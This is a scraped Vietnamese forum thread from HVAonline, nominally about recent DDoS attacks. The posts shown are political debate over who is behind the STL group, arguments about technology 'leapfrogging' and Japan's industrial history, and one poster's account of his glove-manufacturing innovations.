/hvaonline/posts/list/39641.html#246953 /hvaonline/posts/list/39641.html#246953 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246954 /hvaonline/posts/list/39641.html#246954 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. @kutruoi em nói thật cái trang http://danlambaovn.blogspot.com em vào đọc quá nhiều rồi, từ khi HVA phân tích các vụ DDos nhằm vào nó Em đọc rất nhiều bài ở đó, em thấy chả có gì hay, hầu như bài nào em cũng đọc, để em xem nó có cái nhìn mới ko, có cái nhìn từ đa góc cạnh ko, nhưng em chả thấy, đọc hoài đâm chán, cái gì đúng cái gì sai, thì mình bít chứ, mình có phải là con nít đâu mà không cảm nhận được Bác nói vụ tìm mộ thì bác hơi bị sai rồi đấy, có 1 vài người buôn thần bán thánh làm ăn bất chính thì ko nói, còn những người chân chính thì sao, họ cũng tìm ra được cả ngàn cái mộ, sét nghiệm ADN sao đúng vậy mặc dù vậy họ chưa vào chiến trường bao giờ, cho bác 1 khoảng đất em đố bác chỉ được chỗ nào dưới 5 mét có hài cố đấy bác chỉ đi Trong xã hội luôn tồn tại cái trắng và cái đen, nhiều khi ta phải biết chấp nhận, và tìm ra hướng khắc phục Em theo dõi cái chủ đề này cũng lâu, theo em nghĩ STL lại là 1 thế lực muốn lật đổ đảng cộng sản, chúng giả mạo kiểu 1 phe theo chủ nghĩa CS sau đó uýnh lung tung các trang chống đối, tạo nên sự nghi ngờ trong cộng đồng, ... cố tình bôi xấu, để tất cả mọi người đều thấy nhà nước thật là xấu xa, ...sau đó tạo bất ổn xã hội và lật đổ chế độ Đó là suy nghĩ riêng cá nhân em, mong các bác lượng thứ]]> /hvaonline/posts/list/39641.html#246955 /hvaonline/posts/list/39641.html#246955 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. giầu có nhưng ưa thích grey business. " bạn đã tự nói mình ở đâu. bạn gọi mình bằng "ku" điều đó chúng tỏ bạn khá thiểu năng.(thiểu năng là mất đi 1 hoặc nhiều chức năng nào đó) tôi đã từng nói phải hay trái vẫn là 2 mặt của 1 tờ giấy. ps: đọc lại bài muốn chửi ghê.việt nam lắm chổ nói và viết không đúng.ví dụ : "l" và "n", "tr" và ch", "y" và "i".... gần như tất cả các tỉnh thành đều có sai.(1 thằng người việt thiểu năng hết biết chổ nói). kết thúc,chúng ta không nên cãi nhau mà hãy để mọi người nhận xét ai sai chổ nào và đi vào vấn đề chính thì hơn.]]> /hvaonline/posts/list/39641.html#246956 /hvaonline/posts/list/39641.html#246956 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

xsecure wrote:
tôi chẵng theo bất kỳ chủ nghĩa nào ngoài chủ nghĩa cá nhân.và thậm chí là vô thần.(nhưng có đạo đức).tôi không cãi bạn vầ "rỏ hay rõ"và tôi cũng chãng thèm đoán bạn ở đâu mặc dù có thể."và xã hội của nước mình như việc họ muốn nhanh chóng giầu có nhưng ưa thích grey business. " bạn đã tự nói mình ở đâu. bạn gọi mình bằng "ku" điều đó chúng tỏ bạn khá thiểu năng.(thiểu năng là mất đi 1 hoặc nhiều chức năng nào đó) tôi đã từng nói phải hay trái vẫn là 2 mặt của 1 tờ giấy. 
@thuypv : cảm ơn bạn đã đọc và cho nhận xét. bạn không thấy hay vì bạn không cảm nhận được cái đời trong đó. tôi cảm thấy hay vì thay vì tôi chăm chăm vào chăm lo kiếm tiền nuôi riêng thân tôi và gia đình tôi, thì tôi lại đi viết báo, viết về những điều mắt thấy tai nghe và những thở than của con người mọi miền của nước mình .v.v. tôi vẫn tin bạn đầy đủ chức năng, và có một tâm hồn và tinh thần minh mẫn để một ngày kia bạn sẽ thấy ánh sáng của chân lý nơi bình bình : -:|- @xsecure : tặng ku bài thơ này ! ( iêu quá cơ ) tội nghiệp anh tôi, buồn mất thôi bao năm, bao tháng đã qua rồi. mà sao thanh hó còn nguyên giọng. khiến thiểu năng tôi ...nuốt ứ trôi ? + Thiểu năng trí tuệ vẫn là tôi xsecure đó đã mù rồi mù đôi mắt chính, nhìn sự thật mù cả tâm hồn , chết mất thôi ... :| ]]>
/hvaonline/posts/list/39641.html#246957 /hvaonline/posts/list/39641.html#246957 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Mõ mà thôi, mà cái thằng MÕ sưa nay thì rõ lắm chuyện, bé xé thành to, ... tôi đọc rất nhiều bài trong đó, chỉ mong chờ có 1 bài nào đó thể hiện được cái tầm nhìn, cái tư duy vượt lên, ngoài bôi xấu và chỉ trích ra thì chả thấy có cái gì khác chán Thôi bỏ qua mấy cái này đi, anh em tập trung vào chủ đề chính vậy, em vẫn theo dõi thường xuyên Em vẫn bảo lưu quan điểm là STL là 1 thế lực chống đối đảng CS, chúng tạo sự nghi ngờ và làm mất niềm tin từ giới tri thức và giới trẻ với nhà nước, bằng cách giả vờ theo phe nhà nước, chúng biết trong nhà nước vẫn còn rất nhiều người trình độ thấp, vẫn có cái suy nghĩ cổ hủ và lạc hậu đó là quản lý và cấm đoán, tức là năng lực yếu cái này thì ai cũng biết, sau đó chúng tập trung uýnh vào các trang chống đối, vì chúng đều biết rằng ddos rồi cũng sẽ phục hồi dữ liệu lại được, ddos 1 thời gian thì thôi, mục đích thứ 2 đó là: tạo sự nghi ngờ của dân ta với khựa, tưởng khựa nó uýnh ta mà nhà nước ko giám lên tiếng, để thấy mấy ông lãnh đạo thật là hèn nhát, và bất tài, là tay sai cho khựa, ....(thực tế thì 2 thằng bình đẳng, chả thằng nào làm tay sai cho thằng nào cả), tạo sự thù hận và tự tôn dân tộc lên cao, bên khựa chúng cũng làm thế, khi đó 2 đất nước uýnh nhau => loạn, chúng ở giữa trục lợi Ngoài con đường đó ra, thì các thế lực muốn lật đổ đảng cs ko còn cách nào khác, hoạt động giống mấy ông VNCH ở mỹ như ngày xưa ư, xưa cũ và ko còn phù hợp nữa rồi, hoạt động như việt tân ư, cũng ko có tác dụng nốt, cộng sản họ đã bóp chết từ trong chứng nước rồi, chỉ còn 1 cách mượn khựa làm đối trọng đồng thời gây mất niềm tin và nghi ngờ từ trong dân chúng đặc biết là giới trẻ và giới trí thức, ...]]> /hvaonline/posts/list/39641.html#246958 /hvaonline/posts/list/39641.html#246958 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Bạn viết "Đi tắt đón đầu, đón bắt công nghệ" (câu này bạn viết ẩu, không hết ý, phải viết rõ là công nghệ gì chứ?) hoàn toàn không phải là chuyện sai. Nước Nhật cũng đã làm như vậy sau chiến tranh thế giới thứ hai, nên họ mới đuổi kịp Mỹ. Về công nghệ, theo tôi, hiện nay họ vẫn đứng ở mức tiên tiến, chỉ kém Mỹ ở một vài lĩnh vưc.  Thế anh PXMMRF nghĩ trước thế chiến thứ 2 Nhật nó thua công nghệ Mỹ xa lắm sao??? Em nghĩ anh nên xem lại vấn đề này kỹ hơn. Mặc dù không thích Nhật lắm nhưng phải thừa nhận rằng Nhật là một nước có nội lực từ rất lâu rồi. Ngay trong thế chiến thứ 2, vũ khí của nó cũng đã có máy bay, súng ống, đồ điện tử... rồi. Nó mà yếu thì làm sao mà gây chiến với phe đồng minh. Chỉ vì 2 trái bom nguyên tử mà phải mang tiếng kẻ chiến bại chứ Nhật là một nước mạnh về công nghệ đã từ rất lâu. Tất cả những gì Nhật có được ngày hôm nay chẳng qua là hiển nhiên nó phải vậy cho dù có sự giúp đỡ của Mỹ hay là không đi nữa. Hãy xem Nhật đã đem lại những gì cho giới công nghệ dân dụng: Play Station, Karaoke, Máy nghe nhạc Walkman,... và nhiều thứ đồ khác nữa. Hay những cụm từ nổi tiếng như Thần Phong Kamikaze, Sóng Thần Tsunami, Hiệp sĩ đạo Samurai... đều có từ Nhật mà ra. Cho thấy là không hề có cái đi tắt đón đầu nào ở nước Nhật cả, tất cả đều là quá trình học hỏi, nghiên cứu lâu dài mà ra. Nói như anh PXMMRF là đã quá coi nhẹ nội lực của chính nước Nhật. Là một người làm công nghệ điện tử và máy tính, tôi , theo ý kiến cá nhân, khẳng định không bao giờ có cái việc đi tắt đón đầu khỉ gió nào cả. Không có con đường tắt cho sự thành công. Cho dù là có chuyển giao công nghệ đi chăng nữa, thì ngươi kỹ sư vẫn phải đi từ những thứ căn bản mà lên để có thể hiểu rõ công nghệ để mà nếu "may mắn" thì có thể làm nó tốt hơn hoặc "phát minh" ra một cái tốt hơn nhiều lần. Công nghệ có thể lỗi thời nhưng nếu không hiểu cái lỗi thời của nó thì làm sao hiểu được cái hay cái tốt của cái tân tiến. Đã không hiểu thì làm sao mà còn "sáng tạo" được cái gì hay hơn??? Ví như trong HVA, có rất nhiều người sử dụng tốt, nắm bắt tốt công nghệ Computer Networking. Nhưng có mấy ai viết được bài publications đăng trên tạp chí khoa học? Có được bài articles nào trên tạp chí khoa học? Bởi vì "đi tắt đón đầu" chờ nghiên cứu của người khác thì dễ, ngồi tự mày mò theo đuổi nghiên cứu riêng thì mấy ai làm được. Đừng đi tắt, đừng đón đầu, bước những bước thật chậm mà chắc chắn. Một lần nữa, không có con đường tắt cho sự thành công Dù cách viết của kutruoi có hơi lung tung, lan man nhưng về ý chính tôi vẫn đồng ý với quan điểm của bài post #932. Còn ai cảm thấy không chấp nhận được thì hãy đọc bài này http://www.gocnhinalan.com/Details.aspx?id=97 rồi suy nghĩ. Hãy đọc và suy nghĩ. ]]> /hvaonline/posts/list/39641.html#246971 /hvaonline/posts/list/39641.html#246971 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. bán sản phẩm. Họ cần bán càng nhiều càng tốt để kiếm lợi càng nhiều càng tốt. "Chuyển giao" ở đây là "chuyển giao" sản phẩm chớ chẳng phải "chuyển giao" công nghệ. Đây là một cách gọi màu mè và thiếu trung thực. Nó có thể làm mát dạ những ông xếp đặt bút ký hợp đồng bởi vì các ông ấy nghĩ rằng đám kinh doanh "bán" luôn cả cái công nghệ của họ. Thực chất, họ chỉ bán hàng và cùng lắm là cung cấp đủ kiến thức để end-users (kể cả system admin) sử dụng. Chưa có một thứ "công nghệ" nào Việt Nam mua từ nước ngoài để tự do sản xuất và gắn cái nhãn "Made in Vietnam" hết (ngoài một số thứ gia công đơn giản như quần áo, giày dép, thức ăn...v...v...). Thứ nhì, chuyện Nhật lạc hậu trước chiến tranh thế giới thứ II là chuyện nhiều người ngộ nhận. Từ cuối thế kỷ 19 và ngay cả trước đó, Nhật đã có nhiều phát minh khoa học, đặt biệt là về hoá học và vật lý. Nhật không hề "đi tắt đón đầu" mà họ chịu khó học hỏi các nước đã phát triển để lấy nguồn chất xám về để phục hồi lại đất nước của họ. Nhật không có chủ trương thành tích và họ không dạy con nít của họ thói mê thành tích. Người Nhật có tính kỷ luật cao, biết tự giác và tự trọng. Trước đệ nhị thế chiến, đế quốc Nhật đã thừa sức mạnh để đánh chiếm và khống chế cả Sakhalin của Nga, Đài Loan, Đại Hàn và sau đó gần như trọn bộ TQ (để cho đến ngày nay, người TQ vẫn cho rằng thời gian Nhật chiếm TQ là thời gian "đen tối và nhục nhã"). Trước đệ nhị thế chiến, Nhật đã thừa sức chế tạo phi cơ và họ đã có lực lượng quân sự hùng hậu. Những "Kawanishi", "Aichi", "Nakajima"...v...v... đã có từ hồi thập niên 30' của thế kỷ 20 và những thứ ấy không phải là kết quả của "đi tắt đón đầu" mà là một quá trình phát triển công nghệ vững chắc và lâu dài. Thứ ba, một số bạn lôi đảng Việt Tân, đảng Cộng Sản, chế độ VNCH và lôi cả chuyện "chống cộng sản" ra e đã đi quá xa. Việc lôi kéo các "thế lực" chính trị vô đây chỉ nhằm phục vụ mục đích đổ lỗi và bào chữa cho những hành động hư hoại và bẩn thỉu xảy ra trong một thời gian rất dài. Vấn đề ở đây không chỉ nằm ở chỗ "ddos xong rồi thôi" mà còn đi xa đến chỗ sử dụng những biện pháp hoàn toàn phi pháp như trojan, đánh cắp password, đánh cắp thông tin cá nhân, bêu rếu bôi nhọ danh dự người khác, sử dụng tài nguyên của người khác một cách phi pháp ..v...v... ai đã làm những việc này và ai sẽ chịu trách nhiệm những việc này? Xin nhớ cho rằng, bất cứ một quốc gia nào cũng có luật pháp và quy định chớ chẳng phải mà những đám underground hoạt động kiểu mafia. Nếu các thế lực chính trị muốn chơi nhau thì hãy chơi nhau nhưng đừng chơi những chỗ và những cá nhân phi chính trị. Tại sao dantruongx đập "chodientu" thì bị tóm gáy nhưng stl đập vietnamnet thì im lìm? Nếu stl là một đám "mượn khựa để làm đối trọng" và đánh phá, gây bất ổn thì tại sao các cơ quan chức năng lại im lặng? Xin chia sẻ với các bạn là sau một thời gian điều tra cái trò "stl" này, tôi càng lúc càng thấy chán ngán. Chán ngán với những trò thủ đoạn, dối trá, lừa lọc. Chán ngán với những trò che chắn, nhân danh, chụp mũ và đe doạ. Chán ngán với quá nhiều thứ bẩn thỉu và bỉ ổi. Có lẽ tôi ngây thơ quá, cứ nghĩ rằng sự thật và trung thực vẫn được trân quý và gìn giữ nhưng thực sự không phải vậy. Có những thứ quan trọng hơn sự thật, công bằng và trung thực. @ thuypv: nếu blog đó nhảm nhí và vô giá trị thì mặc kệ nó. Nếu nó vô giá trị thì nó sẽ bị bỏ hoang như hàng triệu blog khác. Việc gì phải tốn thời gian và tiền của để dập nó? Ai lại phí thời gian và tiền của để đánh phá mấy cái blogs vô giá trị? Bồ theo dõi thường xuyên chủ đề này thế nào mà đi đến kết luận rằng stl là thế lực chống đối đảng CS vậy? Bồ giải thích cái logic "chống đối đảng CS" bằng cách dập các trang lề trái, dập luôn HVA, dập cả vietnamnet và tất cả các cơ quan chức năng đều im lìm xem?]]> /hvaonline/posts/list/39641.html#246972 /hvaonline/posts/list/39641.html#246972 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246976 /hvaonline/posts/list/39641.html#246976 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. theo kiểu VN, hay như một số nhà máy, cơ quan Việt nam đã làm vừa qua. Tôi không hề đề cập đến ý này. Nhưng dường như bạn đã bình luận theo ý đó. Có lẽ tôi là một trong số không nhiều người hiểu rõ về những nguy hiểm, ngớ ngẩn và tổn thất nặng nề về việc đi tắt đón đầu nắm bắt công nghệ cao của Việt nam, nói chính xác hơn là của khá nhiều nhà máy, cơ quan Việt nam, đăc biệt là các công ty, tập đoàn do nhà nước quản lý (chủ sở hữu là nhà nước). Có nhiều nguyên nhân, trong đó có nguyên nhân là họ có sẵn tiền, đươc ưu tiên cấp tín dụng hoặc vay với lãi suất quá ưu đãi, như là tiền chùa vậy. Tại sao tôi lại biết rõ như vậy, lý do đơn giản là cách đây khoảng 2-3 năm tôi phải hoàn tất một luận án Thac sĩ QTKD (lớp học do các giáo sư Mỹ, châu Âu dạy) dày khoảng 100 trang. Đề tài của luận án là nghiên cứu những tồn tại, bất cập trong hoạt đông KT của các công ty, tập đoàn vốn sở hữu nhà nước dẫn đến hiệu quả thấp, nhiều nguy cơ phá sản. Tồn tai của các tập đoàn, công ty nhà nước thì nhiều, trong đó dĩ nhiên có cả hiện tượng "đi tắt đón đầu. đón bắt công nghệ cao" một cách chủ quan, không khoa học và thiếu tính toán, gây lãng phí nghiêm trong. Tôi phân tích khá kỹ vấn đề này với các thí dụ cụ thể (khoảng 3-4 trang gì đó) Tôi nhớ lúc đó tôi khẳng định là Vinashin phải bị coi là phá sản, vì nợ vay của họ đã gần gấp 10 lần vốn sở hữu (trong khi nơ gấp 2 lần vốn là công ty đã phải đặt vào tình thế báo động) và họ không có khả năng trả nơ khi đáo hạn nơ. Thôi hơi lan man, quay lai vấn đề. Thưc ra cũng có một số ít XN, công ty VN (thường chỉ là các công ty tư nhân hay công ty cổ phần vốn tư nhân chiếm ưu thế) vẫn có cách đi tắt đón đầu nắm công nghệ cao một cách khôn ngoan, hơp lý và có hiệu quả thưc tế (Xin nhớ là tôi đang viết dòng chữ "đi tắt đón đầu nắm bắt công nghệ cao" với nghĩa như tôi đã viết ở đầu bài viết này. Đừng mang cách hiểu của người khác ghép vào đây) Lấy thí dụ ngay tai công ty sản xuất của chính tôi cho thưc tế và dễ hiểu. Công ty tôi sản xuất găng mổ từ cao su thiên nhiên. Công nghệ pha chế latex cao su thiên nhiên với các hoá chất (Vulcanizing agent, Accelerator, Activator...) là bước công nghệ quan trọng quyết định năng suất và chất lượng sản phẩm để có thể canh tranh trên thị trường quốc tế. Tôi đươc đi thưc tập sản xuất tai Ấn độ trong 6 tháng và tôi chủ động đi tham quan sản xuất tai nhiều công ty Malaysia, Thailand, dù để đươc tham quan không dễ chút nào. Ở các công ty Ấn độ và Malaysia, Thailand việc pha chế- lưu hoá latex đươc thưc hiện trên một hệ thống lớn gồm nhiều thùng khuấy có 2 lớp vỏ, dùng gia nhiệt. Các cánh khuấy đươc truyền động lắc qua lắc lại từ một hệ thống truyền đông trung tâm. Tôi mất nhiều thời gian nghiên cứu rất kỹ thưc tế sản xuất ở các nước nói trên, cũng như đoc vô vàn tài liệu KT liên quan đến công nghệ này. Tôi nhận ra một điều là nếu đi theo con đường công nghệ của họ thì không thể nào cạnh tranh với họ được. Vì họ đã có nhiều kinh nghiệm trong việc thưc hành công nghệ (này), họ có một nguồn vốn đầu tư lớn và sản phẩm của họ đã chiếm lĩnh thị trường TG nhiều năm nay, kể cả thị trường VN. Từ đó tôi quyết định nghiên cứu một công nghệ -thiết bị mới, khác hoàn toàn với công nghệ và thiết bị của các nước nói trên. Hệ thống thiết bị pha chế lưu hoá latex do tôi thiết kế là hệ thống lưu hoá-khuấy trộn tuần hoàn phòng đốt ngoài dưới chân không, hoat đông theo một nguyên lý khá hiện đại. Thiết bị gọn nhẹ chỉ chiếm diện diện tích bằng 1/5 đến 1/10 diện tích chiếm chỗ của hệ thống cũ và có hiệu quả kinh tế, kỹ thuật cao. Chất lượng sản phẩm tăng lên rõ rêt. Găng của công ty tôi nay chiếm 50-60% thị phần VN và đánh bật găng nhập khẩu từ nước ngoài, vì chúng tốt hơn và rẻ hơn. Ngoài ra tôi cũng áp dung công nghệ Nano (sử dụng các vật liêu cỡ hat Nano - 1 nano= 1 phần tỷ mét, 1 phần ngàn micron) vào công nghệ sản xuất găng mổ. Do vậy găng của công ty tôi có hình thức khá đẹp (óng ánh, trong trẻo) và có độ bền cơ học cao. Bài hoc thành công của công ty tôi là nghiên cứu kỹ, rất kỹ công nghệ của các nước khác và từ đó tìm ra một công nghệ mới, nắm bắt đươc chiều hướng phát triển của công nghệ cao, không đi theo, bắt chước rồi cố hoàn thiện công nghệ của các nước khác. (Với công trình này và các công trình khác nữa tôi đã nhận giải nhất Khoa hoc-công nghệ VN năm 2006 và có thể năm nay tôi sẽ nhân Giải thưởng NHà nước về KH-CN- Không hiểu có đươc không?) Qua thí dụ trên ta thấy khi nói "đi tắt đón đầu , nắm bắt công nghệ cao" là cần nói rõ thêm là làm theo cách nào, theo kiểu nước nào?. Nếu nói là làm theo kiểu VN, thì cũng nói rõ là theo kiểu công ty nào, đơn vị nào? Nhật bản sau chiến tranh (repeat after second world war) cũng có những trường hơp và thí dụ như trường hơp công ty tôi. Có điều là nó nhiều hơn, rộng khắp trong nền công nghiệp và chắc là khoa học và thông minh hơn. Nếu cần tôi sẽ cho thí dụ về trường hơp xe gắn máy 4 thì và...........các lò phản ứng nguyên tử. Cái gì tôi cũng muốn viết thật thưc tế, để các bạn đọc đỡ chán. ]]> /hvaonline/posts/list/39641.html#246977 /hvaonline/posts/list/39641.html#246977 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246979 /hvaonline/posts/list/39641.html#246979 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. An Ninh Mạng Việt Nam xoá sổ gần 300 blogs, websites "nội dung xấu". Còn về mặt kỹ thuật làm thế nào thì chắc các bạn hiểu rõ khi đọc thread này. Anh TQN trong thời gian đầu đương đầu với STL thấy rất nhiều tên tiếng Tàu khi truy xét tới các thông tin liên quan. Do vậy đủ kết luận là có người TQ trong STL team. Thông tin cuối em bàn tới chính trị tí: Ở VN bây giờ các bô lão chẳng đoàn kết đâu, mạnh thằng nào thằng ấy chiến thôi. Dựa hơi được anh nào càng mạnh để củng cố cái ghế của mình thì càng tốt. Kèm theo đấy là các âm mưu mà có lẽ chỉ có mấy trăm năm sau con cháu mới soi sáng được. Còn việc đi tắt đón đầu cái gì chứ đi tắt đón đầu về TƯ TƯỞNG là không thể, một đất nước thoát khỏi phong kiến thì chỉ còn cách đi qua TBCN, rồi tới cái gì sau đấy thì chưa biết. Nhân loại đã thế rồi, VN cũng chẳng có con đường nào khác, thực tế có lẽ VN đang ở giai đoạn CNTB man rợ (theo đúng từ được học trong sách lịch sử :)), và chúng ta có thành phần TƯ BẢN ĐỎ.]]> /hvaonline/posts/list/39641.html#246980 /hvaonline/posts/list/39641.html#246980 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246981 /hvaonline/posts/list/39641.html#246981 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:
Một số bạn nhận định là An Ninh Mạng Việt Nam không can dự vào mấy kiểu hack, dùng trojan lấy username và password...thì có vẻ không đúng, vì ông Vũ Hải Triều (trung tướng C.A) đã có lần khoe là An Ninh Mạng Việt Nam xoá sổ gần 300 blogs, websites "nội dung xấu". Còn về mặt kỹ thuật làm thế nào thì chắc các bạn hiểu rõ khi đọc thread này. Anh TQN trong thời gian đầu đương đầu với STL thấy rất nhiều tên tiếng Tàu khi truy xét tới các thông tin liên quan. Do vậy đủ kết luận là có người TQ trong STL team. Thông tin cuối em bàn tới chính trị tí: Ở VN bây giờ các bô lão chẳng đoàn kết đâu, mạnh thằng nào thằng ấy chiến thôi. Dựa hơi được anh nào càng mạnh để củng cố cái ghế của mình thì càng tốt. Kèm theo đấy là các âm mưu mà có lẽ chỉ có mấy trăm năm sau con cháu mới soi sáng được. Còn việc đi tắt đón đầu cái gì chứ đi tắt đón đầu về TƯ TƯỞNG là không thể, một đất nước thoát khỏi phong kiến thì chỉ còn cách đi qua TBCN, rồi tới cái gì sau đấy thì chưa biết. Nhân loại đã thế rồi, VN cũng chẳng có con đường nào khác, thực tế có lẽ VN đang ở giai đoạn CNTB man rợ (theo đúng từ được học trong sách lịch sử :)), và chúng ta có thành phần TƯ BẢN ĐỎ. 
@texudo : a) vấn đề bạn đưa lời ông " Vũ Hải Triều " khoe xoá sổ gần 300blogs có nội dung xấu. mình xác định thông tin bạn đưa là thực. b) việc bạn nói anh TQN đối đầu với bọn STL và thấy nhiều " tên tiếng Tầu , khi truy xét các thông tin liên quan ". theo mình là : CHƯA THỂ NÀO đủ để kết luận có người trung quốc tham gia vì : > ví dụ giờ mình có thể code hoặc mark vào những thông tin có liên quan đến vấn đề mình đang làm hoàn toàn bằng tiếng Lào ? các anh khác họ có thể làm hoàn toàn bằng tiếng anh ? hoặc tiếng trung tiếng nhật ? kể cả làm việc trong team work, và đặc biệt làm việc phá hoại người khác thì họ nghĩ ra mọi thủ đoạn để đánh lạc hướng suy luận của mọi người chứ . ?? c) vấn đề chính trị bạn nêu lên mình thấy cũng đúng. @TMDTH : tại hạ không biết nên đã thất lễ với tiền bối. mong rằng tiền bối lượng thứ nếu tại hạ có viết ý gì gây khó chịu. tại hạ xin trân trọng những ý kiến góp ý của tiền bối ạ. tại hạ xin cố gắng sửa, và điều chỉnh chính tả để tiếng việt mình thêm đẹp hơn và đúng nữa . > tiền bối đang nghiên cứu để lập trình một " tool hỗ trợ phân tích sóng gây nhiễu radar ? vậy tiền bối có thể cho tại hạ biết " quá trình đi ngược " của tiền bối về các loại sóng gây nhiễu ? các loại sóng ảnh hướng tối sóng rada ? và nguồn nó ở đâu chưa? . rùi biết đâu anh em HVA lại giúp anh lập trình ok mà . chúc anh thành công . :D @PXMMRF : nếu quả thật là anh và công ty của anh đã cải tiến quy trình công nghệ của họ ( Malaysia, Thailand ) trong quá trình sản xuất và đạt được những thành công và tiết kiệm; thì đây là một sáng chế mà. và điều này không phải là " đi tắt đón đầu " mà đây là phát triển, cải tạo thêm, sáng chế thêm và ứng dụng linh hoạt hơn các techno của họ. ]]>
/hvaonline/posts/list/39641.html#246982 /hvaonline/posts/list/39641.html#246982 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Lấy thí dụ ngay tai công ty sản xuất của chính tôi cho thưc tế và dễ hiểu. Công ty tôi sản xuất găng mổ từ cao su thiên nhiên. Công nghệ pha chế latex cao su thiên nhiên với các hoá chất (Vulcanizing agent, Accelerator, Activator...) là bước công nghệ quan trọng quyết định năng suất và chất lượng sản phẩm để có thể canh tranh trên thị trường quốc tế. Tôi đươc đi thưc tập sản xuất tai Ấn độ trong 6 tháng và tôi chủ động đi tham quan sản xuất tai nhiều công ty Malaysia, Thailand, dù để đươc tham quan không dễ chút nào. Ở các công ty Ấn độ và Malaysia, Thailand việc pha chế- lưu hoá latex đươc thưc hiện trên một hệ thống lớn gồm nhiều thùng khuấy có 2 lớp vỏ, dùng gia nhiệt. Các cánh khuấy đươc truyền động lắc qua lắc lại từ một hệ thống truyền đông trung tâm. Tôi mất nhiều thời gian nghiên cứu rất kỹ thưc tế sản xuất ở các nước nói trên, cũng như đoc vô vàn tài liệu KT liên quan đến công nghệ này. Tôi nhận ra một điều là nếu đi theo con đường công nghệ của họ thì không thể nào cạnh tranh với họ được. Vì họ đã có nhiều kinh nghiệm trong việc thưc hành công nghệ (này), họ có một nguồn vốn đầu tư lớn và sản phẩm của họ đã chiếm lĩnh thị trường TG nhiều năm nay, kể cả thị trường VN. Từ đó tôi quyết định nghiên cứu một công nghệ -thiết bị mới, khác hoàn toàn với công nghệ và thiết bị của các nước nói trên. Hệ thống thiết bị pha chế lưu hoá latex do tôi thiết kế là hệ thống lưu hoá-khuấy trộn tuần hoàn phòng đốt ngoài dưới chân không, hoat đông theo một nguyên lý khá hiện đại. Thiết bị gọn nhẹ chỉ chiếm diện diện tích bằng 1/5 đến 1/10 diện tích chiếm chỗ của hệ thống cũ và có hiệu quả kinh tế, kỹ thuật cao. Chất lượng sản phẩm tăng lên rõ rêt. Găng của công ty tôi nay chiếm 50-60% thị phần VN và đánh bật găng nhập khẩu từ nước ngoài, vì chúng tốt hơn và rẻ hơn. Ngoài ra tôi cũng áp dung công nghệ Nano (sử dụng các vật liêu cỡ hat Nano - 1 nano= 1 phần tỷ mét, 1 phần ngàn micron) vào công nghệ sản xuất găng mổ. Do vậy găng của công ty tôi có hình thức khá đẹp (óng ánh, trong trẻo) và có độ bền cơ học cao. Bài hoc thành công của công ty tôi là nghiên cứu kỹ, rất kỹ công nghệ của các nước khác và từ đó tìm ra một công nghệ mới, nắm bắt đươc chiều hướng phát triển của công nghệ cao, không đi theo, bắt chước rồi cố hoàn thiện công nghệ của các nước khác. ......  
Có thể lạc đề một chút nhưng điểm anh PXM đưa ra lý thú quá nên em xin phép... lạc đề một tí :P . Em thấy ví dụ anh PXM đưa ra rất lý thú và rất đáng chiêm ngưỡng. Tuy nhiên, theo em thấy, tinh thần anh nêu ra ở đây thuộc phạm trù quan sát và cải tiến (innovating) chớ không hẳn là "đi tắt đón đầu" (skipping processes). Thật ra anh không hề "đi tắt" mà anh đã tốn rất nhiều thời gian và công sức để nghiên cứu những gì đã có của nước ngoài, sau đó mới hình thành giải pháp đặt thù và hữu hiệu nhất cho mình. Hơn nữa, kiến thức về hoá chất của anh chắc chắn phải có sẵn và đã hình thành từ trước, sau đó, từ quan sát và đúc kết những gì đã được hình thành trong công nghệ, anh mới tạo ra một lối phát triển và ứng dụng mới. Anh không thể đốt giai đoạn kiến thức và đốt giai đoạn quan sát thực tế được. Ngay cả việc hình thành một mô hình lưu hoá kia, anh vẫn phải đi xuyên qua giai đoạn thử nghiệm và điều chỉnh chớ không thể "đi tắt" bằng cách hình thành ngay hệ thống hoàn chỉnh được. Vấn đề cần bàn ở đây là tư duy "đi tắt đón đầu" bị ngộ nhận một cách tội nghiệp khiến cho không ít người bị lỗ hổng khủng khiếp trong quá trình đào luyện chuyên môn. Cái này thể hiện rất rộng với thái độ 'mì ăn liền' trong hầu hết khía cạnh trong đời sống và đây là điều cực kỳ tai hại. @ all, một điều tớ nhận thấy càng lúc càng rõ rằng có một khúc mắc khá lớn trong việc thảo luận và phê bình. Có rất nhiều bạn rất dễ phản ứng trước phê bình và luôn luôn cho rằng "phê bình" là "bôi xấu và chỉ trích". Nên phân biệt một cách rõ ràng là - "Phê bình" là phân tích và đánh giá sự thể để rồi đi đến hướng khắc phục. - "Bôi xấu và chỉ trích" là phân tích và đánh giá sự thể nhưng không đi đến hướng khắc phục mà chỉ nói cho sướng miệng. Một cái mang tính tích cực, một cái mang tính tiêu cực. Tích cực ở chỗ nó đưa ra (ít ra) một hướng để giải quyết. Tiêu cực ở chỗ nó không đưa ra hướng giải quyết. Nên trân trọng những phê bình tích cực và nên dẹp bỏ thói quen tự ái khi đứng trước sự phê bình. Điều buồn cười hơn nữa, "chính trị" là thứ cấm kỵ nhưng khối người thích dùng "chính trị" để gán ghép cho việc phê bình. Hầu hết các phê bình về hiện trạng xã hội, kinh tế, văn hoá, khoa học, kỹ thuật, đời sống...v...v... đều bị ép vô cái khuôn chính trị để kết tử nó bằng lăng kính chính trị: phản động và không phản động. Tư duy con người không nên đơn giản và hạn hẹp như vậy. Thôi nhá bà con. Tốt nhất là không nên nói chuyện "chính trị" cho đến khi nào tư duy được hình thành vững vàng.]]>
/hvaonline/posts/list/39641.html#246984 /hvaonline/posts/list/39641.html#246984 GMT
